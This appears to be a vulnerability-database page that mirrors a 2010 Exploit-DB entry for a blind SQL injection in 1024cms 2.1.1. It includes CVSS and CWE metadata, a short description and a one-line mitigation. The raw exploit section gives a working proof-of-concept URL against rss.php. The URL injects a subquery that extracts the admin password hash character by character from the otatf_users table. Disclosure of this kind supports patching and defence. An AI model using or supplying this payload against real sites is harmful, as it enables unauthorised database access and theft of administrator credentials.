header-logo
Suggest Exploit
vendor:
1024cms
by:
Stephan Sattler
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: 1024cms
Affected Version From: 2.1.1
Affected Version To: 2.1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:1024cms:1024cms:2.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

1024cms 2.1.1 Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in 1024cms 2.1.1. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. This can allow the attacker to extract data from the database, including passwords and other sensitive information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: 1024cms 2.1.1 Blind SQL Injection Vulnerability
# Date: 07.09.2010
# Author: Stephan Sattler // Solidmedia.de
# Software Website: http://1024cms.org
# Software Link: http://d10xg45o6p6dbl.cloudfront.net/projects/f/freecms1024/1024_v2.zip
or http://sourceforge.net/projects/cms-cvi/files/v2.1.zip/download
# Version: 2.1.1


[ Vulnerability//PoC ]

http://[site]/[path]/rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='[first character of admin hash]
example: http://[site]/[path]/rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='c